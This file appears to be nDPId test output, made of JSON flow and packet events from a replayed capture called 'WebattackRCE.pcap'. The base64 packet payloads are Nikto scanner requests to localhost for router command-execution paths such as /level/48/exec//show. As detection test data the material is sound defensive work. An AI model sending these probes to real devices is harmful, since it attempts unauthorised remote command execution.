-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277633,"pkt":"AAAAAAAAAAAAAAAACABFAADIENVAAEAGK1l\/AAABfwAAAcZCH5APvynUeLRgIoAYAED+vAAAAQEICp1m\/qmdZv6oR0VUIC9sZXZlbC80OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277637,"pkt":"AAAAAAAAAAAAAAAACABFAADIJlxAAEAGFdJ\/AAABfwAAAcZEH5CFHB9c3vOX2IAYAED+vAAAAQEICp1m\/q2dZv6tR0VUIC9sZXZlbC80OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277639,"pkt":"AAAAAAAAAAAAAAAACABFAADIZI9AAEAG155\/AAABfwAAAcZGH5DAl12NotXkTIAYAED+vAAAAQEICp1m\/q+dZv6vR0VUIC9sZXZlbC81MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277642,"pkt":"AAAAAAAAAAAAAAAACABFAADIuMhAAEAGg2V\/AAABfwAAAcZIH5DuPYHFtiFXooAYAED+vAAAAQEICp1m\/rKdZv6yR0VUIC9sZXZlbC81MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277644,"pkt":"AAAAAAAAAAAAAAAACABFAADIp2FAAEAGlMx\/AAABfwAAAcZKH5BZVp5d6Tz88YAYAED+vAAAAQEICp1m\/rSdZv60R0VUIC9sZXZlbC81Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277646,"pkt":"AAAAAAAAAAAAAAAACABFAADIRMlAAEAG92R\/AAABfwAAAcZMH5Ck2n3FkPG1\/IAYAED+vAAAAQEICp1m\/radZv62R0VUIC9sZXZlbC81My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277648,"pkt":"AAAAAAAAAAAAAAAACABFAADIfG5AAEAGv79\/AAABfwAAAcZOH5Bk90VplsnARIAYAED+vAAAAQEICp1m\/ridZv64R0VUIC9sZXZlbC81NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277650,"pkt":"AAAAAAAAAAAAAAAACABFAADIGk5AAEAGIeB\/AAABfwAAAcZQH5A3JSNJK84\/noAYAED+vAAAAQEICp1m\/rmdZv65R0VUIC9sZXZlbC81NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277657,"pkt":"AAAAAAAAAAAAAAAACABFAADIqGlAAEAGk8R\/AAABfwAAAcZSH5BRNZFiv2NJXIAYAED+vAAAAQEICp1m\/sGdZv7AR0VUIC9sZXZlbC81Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277658,"pkt":"AAAAAAAAAAAAAAAACABFAADIKidAAEAGEgd\/AAABfwAAAcZUH5DRhBMk1ziDVIAYAED+vAAAAQEICp1m\/sKdZv7CR0VUIC9sZXZlbC81Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDQpDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277660,"pkt":"AAAAAAAAAAAAAAAACABFAADI7vpAAEAGTTN\/AAABfwAAAcZWH5Ba4NgASBBLBYAYAED+vAAAAQEICp1m\/sSdZv7ER0VUIC9sZXZlbC81OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}} 
